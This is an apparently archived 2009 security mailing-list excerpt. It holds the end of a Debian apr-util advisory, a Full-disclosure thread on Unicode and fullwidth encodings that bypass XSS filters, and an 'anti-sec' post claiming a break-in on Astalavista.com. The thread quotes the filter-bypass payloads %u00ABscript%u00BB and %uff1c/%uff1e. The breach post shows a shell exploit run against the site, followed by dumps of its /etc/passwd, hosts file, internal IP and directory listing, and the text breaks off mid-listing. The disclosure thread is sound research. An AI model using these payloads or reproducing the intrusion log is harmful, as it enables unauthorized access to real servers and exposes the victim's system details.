Size/MD5 checksum: 83614 7bc2f02a403bb653dde89fc6efd34e7b http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_alpha.deb Size/MD5 checksum: 148054 45641c57b04ca3470eda5df4ce26742c http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_alpha.deb Size/MD5 checksum: 128914 03bc9c912b8b625af79f39284d45eeed amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_amd64.deb Size/MD5 checksum: 72828 4fc0d12955c259cf26aab065b174ccf3 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_amd64.deb Size/MD5 checksum: 127854 fec6f28c19ad170d97e431a8657d6d3b http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_amd64.deb Size/MD5 checksum: 124516 6097da9f80f44b379f1b1d46aa13867a arm architecture (ARM) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_arm.deb Size/MD5 checksum: 66038 d7c116a4589f3f280d3a8f6f698afc8a http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_arm.deb Size/MD5 checksum: 116800 e46133d4e4e2191dae95e7d70df22b41 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_arm.deb Size/MD5 checksum: 121028 8d1d8a51de432ecdca221d3aab3a0342 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_hppa.deb Size/MD5 checksum: 133822 0060e1aa0428f163fd8a2391afd42d86 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_hppa.deb Size/MD5 checksum: 126066 a197984d5f90879bfd5f5161d82fb793 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_hppa.deb Size/MD5 checksum: 78586 4dce52054b7fd81027e5f002d36b9ca1 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_i386.deb Size/MD5 checksum: 68680 d65d8158a672fc285a5329a96f927ff0 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_i386.deb Size/MD5 checksum: 116416 0fffc0910d45788aa2e5632913f97b5e http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_i386.deb Size/MD5 checksum: 122170 5c6fe8e442ec6aa146cc5f534d045e70 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_ia64.deb Size/MD5 checksum: 118768 c240a8957e74b4133d14524d65a0ca84 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_ia64.deb Size/MD5 checksum: 156554 75f7ef24fb756f82c41c376fbb976eb2 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_ia64.deb Size/MD5 checksum: 99380 31a30996ae576e028cd7d1b0e248096d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_mips.deb Size/MD5 checksum: 130216 64f856948c06a836e1e7ccb5288a8fd5 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_mips.deb Size/MD5 checksum: 130378 5c2bcd90e3e764b63fad5e7108f2f5c7 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_mips.deb Size/MD5 checksum: 70666 d8f16a952a9b49f1c1cce2dba45d4b67 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_mipsel.deb Size/MD5 checksum: 130588 d24b45d678dd58b62518ddf1f6d9fd2f http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_mipsel.deb Size/MD5 checksum: 127794 2d8ed73655993e12cdb0d4b316315f2c http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_mipsel.deb Size/MD5 checksum: 70674 5242004658e91c173b717bde60a8085e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_powerpc.deb Size/MD5 checksum: 130406 0016513b87ff4564f5ff69621d431e13 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_powerpc.deb Size/MD5 checksum: 125072 bc5539dda0daa900abfe77a088899f16 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_powerpc.deb Size/MD5 checksum: 72400 28647bd35db14975a678c4424f0fb4aa s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_s390.deb Size/MD5 checksum: 128360 df7691e2ac57d344c7c341ea7f606f3a http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_s390.deb Size/MD5 checksum: 76592 482e412db007c81e2174a6bd729fc2a0 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_s390.deb Size/MD5 checksum: 124716 9405781379de1b80fc8c7bd18260bd3c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.7+dfsg-2+etch2_sparc.deb Size/MD5 checksum: 117158 bb4555e88f9b7f2a1127f24970b0863b http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.7+dfsg-2+etch2_sparc.deb Size/MD5 checksum: 118574 366b392d5b9ba2771b08bec842ecca9a http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_sparc.deb Size/MD5 checksum: 66320 895fccdd633a9323f2e892a333e2f1f1 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.12+dfsg.orig.tar.gz Size/MD5 checksum: 658687 4ef3e41037fe0cdd3a0d107335a008eb http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.12+dfsg-8+lenny2.dsc Size/MD5 checksum: 1530 2e0b102b714edffebe80b7522b60eb93 http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.12+dfsg-8+lenny2.diff.gz Size/MD5 checksum: 22021 5ac66e9e3e4a3b3f93f25a075d7087ea alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_alpha.deb Size/MD5 checksum: 146564 57902eabc0f7164fdb65f99742e774a9 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_alpha.deb Size/MD5 checksum: 157358 74fe3e8f488bca9d715a91852748215a http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_alpha.deb Size/MD5 checksum: 90574 78164e1209b66d8358931a4c783abf9e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_amd64.deb Size/MD5 checksum: 132654 20dc399a6c86153c0021d273b34eceaf http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_amd64.deb Size/MD5 checksum: 147538 ed67540d4baa9bce263df53c180e883e http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_amd64.deb Size/MD5 checksum: 79814 4b71fcc802a207c1d1e1f54c4460c775 arm architecture (ARM) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_arm.deb Size/MD5 checksum: 124566 bddd5c3e65dfbe7cba72edf1872f6612 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_arm.deb Size/MD5 checksum: 71258 44658bee5eb78ff87e93008dd2d5ef1b http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_arm.deb Size/MD5 checksum: 138786 06343f2a0707a8aab17cf292da23ab7c armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_armel.deb Size/MD5 checksum: 125382 63b253107c09d8f22a74daf4e75c0d4f http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_armel.deb Size/MD5 checksum: 138852 d19e3658c9d0659845c2b27c9130c871 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_armel.deb Size/MD5 checksum: 69786 22e9c23a71adec339b6048e4909e7b64 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_hppa.deb Size/MD5 checksum: 139700 67e358018e90e3a0a112f2b0ecb5c8e1 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_hppa.deb Size/MD5 checksum: 83228 5e90a7a8e2f17dbe1099b4275dbfecce http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_hppa.deb Size/MD5 checksum: 142974 bdac87da2eb60b9c2dc5f2cb77065135 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_i386.deb Size/MD5 checksum: 120742 8f22bb0169bb8adfafb8295cd8e11a5d http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_i386.deb Size/MD5 checksum: 73636 e8bafce964601ca062a3e8dc3e9ab887 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_i386.deb Size/MD5 checksum: 141210 9cfb5f9c9a81d8c9d246bcda411330d5 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_ia64.deb Size/MD5 checksum: 135222 6e69a6671e161d561c74db4328f83002 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_ia64.deb Size/MD5 checksum: 110928 6edc23e6b3e254d9e3a945eb8b201549 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_ia64.deb Size/MD5 checksum: 169954 af3e28f3b3f42df488885d2bf8025a4b mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_mips.deb Size/MD5 checksum: 147132 96b0bf6e077e8abc8ce12fff05b4151d http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_mips.deb Size/MD5 checksum: 74196 128cbbed2eaaa51c2e92a4bfe6076cd0 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_mips.deb Size/MD5 checksum: 137308 af2189d769dd968ef38b47a22664de82 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_mipsel.deb Size/MD5 checksum: 74124 4894b4b56cc740ca877af667681ebfaa http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_mipsel.deb Size/MD5 checksum: 144442 37c6b6c54ab1b0539d10565d4c668f6b http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_mipsel.deb Size/MD5 checksum: 136152 e0b1e255aabc2db28542107ad15f5b46 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_powerpc.deb Size/MD5 checksum: 146778 34fd3aab3b62f4e3ccaa3ce6a27aa08d http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_powerpc.deb Size/MD5 checksum: 82798 4f81cdc2bb6a92c9add30ce0c5566226 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_powerpc.deb Size/MD5 checksum: 132238 5fc82f511183058f4138c4cd07ec1ca9 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_s390.deb Size/MD5 checksum: 85280 c185347abe5db6c3c5c797714a476454 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_s390.deb Size/MD5 checksum: 148334 b3bfbab7f4e064ab3065070879c28faf http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_s390.deb Size/MD5 checksum: 132826 d547ee5465f7bef60c954de4d6721b31 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.12+dfsg-8+lenny2_sparc.deb Size/MD5 checksum: 72812 9b27f0c316fd15a2535fd571bca5faa9 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dev_1.2.12+dfsg-8+lenny2_sparc.deb Size/MD5 checksum: 124558 e3e07157b4bb28ec91168b6a038474d0 http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1-dbg_1.2.12+dfsg-8+lenny2_sparc.deb Size/MD5 checksum: 132136 f82857755ceba785fe679c16fe865f1d These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkooHqoACgkQXm3vHE4uylqWLACgrmHwQvY31zOkkz13KzOjDnrU iuwAn0pivdsNaFbtP2y7ScRu1kAP6N8S =onLw -----END PGP SIGNATURE----- From arian.evans at anachronic.com Thu Jun 4 23:10:16 2009 From: arian.evans at anachronic.com (Arian J. Evans) Date: Thu, 4 Jun 2009 15:10:16 -0700 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <cd1bdfdd0705220952i5879abd1o60ce59f7abae5b2b@mail.gmail.com> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <cd1bdfdd0705220952i5879abd1o60ce59f7abae5b2b@mail.gmail.com> Message-ID: <cd1bdfdd0906041510l32983825ubf1bff7fbaaa9a2c@mail.gmail.com> Hello 3APA3A -- Remember this thread you started 2 years ago? Long Time no discussion on this topic... :) Turns out you were spot-on. We verified six different variants of this. Jeremiah Grossman published details on his blog: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html It is important to note that when you read the number counts that say: 11 exploitable XSS in 8 websites: %u00ABscript%u00BB The count of "11" is "11 /path/ locations or forms in a web application", not "11 vulnerable inputs". The location might be a .cgi or a servlet, with 1 or dozens of inputs in that same location that are all "vulnerable" to the same attack technique. (We call the individual inputs "attack vectors" instead of "vulnerabilities" to help people group them and make them more actionable. e.g.-people usually don't go fix one input, but instead fix the CGI, servlet, form-input/request-handler and all the associated inputs at once. So reporting each input individually doesn't provide any benefit besides make reports bigger.) Anyway, there are many more of these kind of false-familiar/transliteral transcoding and canonicalization issues. I will continue to feed anything interesting to Jeremiah and it will probably wind up on his blog. Thanks again for opening my mind up to some new angles for filter-evasion tricks! :) ciao -- Arian Evans I invest most of my money in motorcycles, mistresses, and martinis. The rest of it I squander. On Tue, May 22, 2007 at 9:52 AM, Arian J. Evans <arian at anachronic.com> wrote: > > I'll let you know if this hits. I am running this test currently on about 600 + sites. > > -ae > > On 5/22/07, 3APA3A < 3APA3A at security.nnov.ru> wrote: >> >> Dear full-disclosure at lists.grok.org.uk, >> >> ??By??the??way:??I saw Unicode Left Pointing Double Angel Quotation Mark >> ??(%u00AB) / Unicode Right Pointing Double Angel Quotation Mark (%u00BB) >> ??are??sometimes??translated??to '<' and '>'. Does somebody experimented >> ??with >> >> ??%u00ABscript%u00BB >> >> ??in different environments to bypass filtering in this way? >> >> -- >> http://securityvulns.com/ >> ???????? /\_/\ >> ????????{ , . }???? |\ >> +--oQQo->{ ^ }<-----+ \ >> |??ZARAZA??U??3APA3A?? } You know my name - look up my number (The Beatles) >> +-------------o66o--+ / >> ????????????????????|/ From prasad.shenoy at gmail.com Fri Jun 5 00:22:03 2009 From: prasad.shenoy at gmail.com (Prasad Shenoy) Date: Thu, 4 Jun 2009 19:22:03 -0400 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <cd1bdfdd0906041510l32983825ubf1bff7fbaaa9a2c@mail.gmail.com> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <cd1bdfdd0705220952i5879abd1o60ce59f7abae5b2b@mail.gmail.com> <cd1bdfdd0906041510l32983825ubf1bff7fbaaa9a2c@mail.gmail.com> Message-ID: <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> Has %uff1c %uff1e become very common? I have found a few places where these are still exploitable. Sometime in the coming week I will post my observation from one particular encounter of this vulnerability to get some responses on what, why and how it is happening. This email gave a good head start..... Cheers, Prasad Shenoy On Thu, Jun 4, 2009 at 6:10 PM, Arian J. Evans <arian.evans at anachronic.com>wrote: > Hello 3APA3A -- Remember this thread you started 2 years ago? Long > Time no discussion on this topic... :) > > Turns out you were spot-on. We verified six different variants of > this. Jeremiah Grossman published details on his blog: > > > http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html > > It is important to note that when you read the number counts that say: > > 11 exploitable XSS in 8 websites: > %u00ABscript%u00BB > > The count of "11" is "11 /path/ locations or forms in a web > application", not "11 vulnerable inputs". The location might be a .cgi > or a servlet, with 1 or dozens of inputs in that same location that > are all "vulnerable" to the same attack technique. > > (We call the individual inputs "attack vectors" instead of > "vulnerabilities" to help people group them and make them more > actionable. e.g.-people usually don't go fix one input, but instead > fix the CGI, servlet, form-input/request-handler and all the > associated inputs at once. So reporting each input individually > doesn't provide any benefit besides make reports bigger.) > > Anyway, there are many more of these kind of > false-familiar/transliteral transcoding and canonicalization issues. > > I will continue to feed anything interesting to Jeremiah and it will > probably wind up on his blog. > > Thanks again for opening my mind up to some new angles for > filter-evasion tricks! :) > > ciao > > -- > Arian Evans > I invest most of my money in motorcycles, mistresses, and martinis. > The rest of it I squander. > > > > > On Tue, May 22, 2007 at 9:52 AM, Arian J. Evans <arian at anachronic.com> > wrote: > > > > I'll let you know if this hits. I am running this test currently on about > 600 + sites. > > > > -ae > > > > On 5/22/07, 3APA3A < 3APA3A at security.nnov.ru> wrote: > >> > >> Dear full-disclosure at lists.grok.org.uk, > >> > >> By the way: I saw Unicode Left Pointing Double Angel Quotation Mark > >> (%u00AB) / Unicode Right Pointing Double Angel Quotation Mark (%u00BB) > >> are sometimes translated to '<' and '>'. Does somebody experimented > >> with > >> > >> %u00ABscript%u00BB > >> > >> in different environments to bypass filtering in this way? > >> > >> -- > >> http://securityvulns.com/ > >> /\_/\ > >> { , . } |\ > >> +--oQQo->{ ^ }<-----+ \ > >> | ZARAZA U 3APA3A } You know my name - look up my number (The > Beatles) > >> +-------------o66o--+ / > >> |/ > > > ---------------------------------------------------------------------------- > Join us on IRC: irc.freenode.net #webappsec > > Have a question? Search The Web Security Mailing List Archives: > http://www.webappsec.org/lists/websecurity/archive/ > > Subscribe via RSS: > http://www.webappsec.org/rss/websecurity.rss [RSS Feed] > > Join WASC on LinkedIn > http://www.linkedin.com/e/gis/83336/4B20E4374DBA > > -- Thought for the day - "Emails can hurt feelings. If this one did, please ignore your feelings." -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090604/4ef99861/attachment.html From arian.evans at anachronic.com Fri Jun 5 00:41:32 2009 From: arian.evans at anachronic.com (Arian J. Evans) Date: Thu, 4 Jun 2009 16:41:32 -0700 Subject: [Full-disclosure] [WEB SECURITY] Unicode Left/Right Pointing Double Angel Quotation Mark bypass? In-Reply-To: <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> References: <1010180926.20070522165803@SECURITY.NNOV.RU> <cd1bdfdd0705220952i5879abd1o60ce59f7abae5b2b@mail.gmail.com> <cd1bdfdd0906041510l32983825ubf1bff7fbaaa9a2c@mail.gmail.com> <43c6c8500906041622w5ad9d1car524171b3d0f0ff07@mail.gmail.com> Message-ID: <cd1bdfdd0906041641m5cf9dccak8ebe5e1a6be8c49c@mail.gmail.com> On Thu, Jun 4, 2009 at 4:22 PM, Prasad Shenoy <prasad.shenoy at gmail.com> wrote: > Has %uff1c %uff1e become very common? We have seen 44 sites in the last year at WhiteHat Security that were vulnerable to Fullwidth unicode-encoded attacks. This one tends to be more ubiquitous than others when you find it. In the applications weak to this -- we found roughly 200 locations vulnerable to attack in those 44 applications, and each location would have multiple inputs, so you are probably talking 1,000+ inputs vulnerable to attack using this encoding. > I have found a few places where these > are still exploitable. Sometime in the coming week I will post my > observation from one particular encounter of this vulnerability to get some > responses on what, why and how it is happening. Interesting. I did some research here too, and found a new Unicode standard that I think might be a culprit. I won't be posting any more of the data in this thread. There is simply too much of it Jeremiah will be posting some of it at his blog below, and ultimately there needs to be a good paper on canonicalization. None has yet been written for the web world. The VXer crowd went through this in the 90's with all of their encoding-evasion techniques for viruses, and then K2's Polymorphic Shell Code tool brought similar concepts to payloads delivered across network protocols. Now the same notions of multiple representations and re-assemblies of data, in this case to form exploits, is rearing its head in the webappsec world. Nothing is new under the sun. :) Attackers already use encoding in the wild for SQL injection, and at least one XSS I have seen. Probably 50% of the encoding techniques I know of that can be leveraged to form attacks -- I cannot even find documented. So I know our community has some large knowledge gaps on this subject at the moment and needs more work here. -ae > This email gave a good head start..... > > Cheers, > Prasad Shenoy > > On Thu, Jun 4, 2009 at 6:10 PM, Arian J. Evans <arian.evans at anachronic.com> > wrote: >> >> Hello 3APA3A -- Remember this thread you started 2 years ago? Long >> Time no discussion on this topic... :) >> >> Turns out you were spot-on. We verified six different variants of >> this. Jeremiah Grossman published details on his blog: >> >> >> http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html >> >> It is important to note that when you read the number counts that say: >> >> 11 exploitable XSS in 8 websites: >> %u00ABscript%u00BB >> >> The count of "11" is "11 /path/ locations or forms in a web >> application", not "11 vulnerable inputs". The location might be a .cgi >> or a servlet, with 1 or dozens of inputs in that same location that >> are all "vulnerable" to the same attack technique. >> >> (We call the individual inputs "attack vectors" instead of >> "vulnerabilities" to help people group them and make them more >> actionable. e.g.-people usually don't go fix one input, but instead >> fix the CGI, servlet, form-input/request-handler and all the >> associated inputs at once. So reporting each input individually >> doesn't provide any benefit besides make reports bigger.) >> >> Anyway, there are many more of these kind of >> false-familiar/transliteral transcoding and canonicalization issues. >> >> I will continue to feed anything interesting to Jeremiah and it will >> probably wind up on his blog. >> >> Thanks again for opening my mind up to some new angles for >> filter-evasion tricks! :) >> >> ciao >> >> -- >> Arian Evans >> I invest most of my money in motorcycles, mistresses, and martinis. >> The rest of it I squander. >> >> >> >> >> On Tue, May 22, 2007 at 9:52 AM, Arian J. Evans <arian at anachronic.com> >> wrote: >> > >> > I'll let you know if this hits. I am running this test currently on >> > about 600 + sites. >> > >> > -ae >> > >> > On 5/22/07, 3APA3A < 3APA3A at security.nnov.ru> wrote: >> >> >> >> Dear full-disclosure at lists.grok.org.uk, >> >> >> >> ??By??the??way:??I saw Unicode Left Pointing Double Angel Quotation >> >> Mark >> >> ??(%u00AB) / Unicode Right Pointing Double Angel Quotation Mark >> >> (%u00BB) >> >> ??are??sometimes??translated??to '<' and '>'. Does somebody >> >> experimented >> >> ??with >> >> >> >> ??%u00ABscript%u00BB >> >> >> >> ??in different environments to bypass filtering in this way? >> >> >> >> -- >> >> http://securityvulns.com/ >> >> ???????? /\_/\ >> >> ????????{ , . }???? |\ >> >> +--oQQo->{ ^ }<-----+ \ >> >> |??ZARAZA??U??3APA3A?? } You know my name - look up my number (The >> >> Beatles) >> >> +-------------o66o--+ / >> >> ????????????????????|/ >> >> >> ---------------------------------------------------------------------------- >> Join us on IRC: irc.freenode.net #webappsec >> >> Have a question? Search The Web Security Mailing List Archives: >> http://www.webappsec.org/lists/websecurity/archive/ >> >> Subscribe via RSS: >> http://www.webappsec.org/rss/websecurity.rss [RSS Feed] >> >> Join WASC on LinkedIn >> http://www.linkedin.com/e/gis/83336/4B20E4374DBA >> > > > > -- > Thought for the day - > "Emails can hurt feelings. If this one did, please ignore your feelings." > From srshaxsir at hushmail.com Fri Jun 5 02:58:07 2009 From: srshaxsir at hushmail.com (srshaxsir at hushmail.com) Date: Fri, 05 Jun 2009 04:58:07 +0300 Subject: [Full-disclosure] Astalavista.com Exposed Message-ID: <20090605015807.A9817B0044@smtp.hushmail.com> Astalavista.com Astalavista.net The Hacking & Security Community [+] Founded in 1997 by a hacker computer enthusiast [-] Exposed in 2009 by anti-sec group >From <http://astalavista.com/faq>: >> 03. Who's behind the site? >> >> A team of security and IT professionals, and a countless number of contributors from all over the world. >> 05. Is it true that the site is visited by script-kiddies and warez fans only? >> >> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non- profit organizations, government and military institutions. >> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information. Why has Astalavista been targeted? Other than the fact that they are not doing any of this for the "community" but for the money, they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and they charge you $6.66 per months to access a dead forum with a directory filled with public releases and outdated / broken services. We wanted to see how good that "team of security and IT professionals" really is. Let's begin. anti-sec:~# ./g0tshell astalavista.com -p 80 [+] Connecting to astalavista.com:80 [+] Grabbing banner... LiteSpeed [+] Injecting shellcode... [-] Wait for it [~] We g0tshell uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux ID: uid=100(apache) gid=500(apache) groups=500(apache) sh-3.2$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin apache:x:100:500::/var/www:/bin/false diradmin:x:101:101::/usr/local/directadmin:/bin/bash mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash webapps:x:500:501::/var/www/html:/bin/bash majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash admin:x:501:502::/home/admin:/bin/bash jon:x:502:503::/home/jon:/bin/bash com:x:503:504::/home/com:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin astanet:x:504:505::/home/astanet:/bin/bash avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi- autoipd:/sbin/nologin sh-3.2$ cat /etc/hosts # Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 localhost.localdomain localhost ::1 localhost6.localdomain6 localhost6 80.74.154.172 asta1.astalavistaserver.com sh-3.2$ pwd /home/com/public_html sh-3.2$ ls -la total 18460 drwxr-xr-x 30 com apache 4096 May 28 17:06 . drwx--x--x 11 com com 4096 Jun 25 2008 .. drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache drwxr-xr-x 6 com com 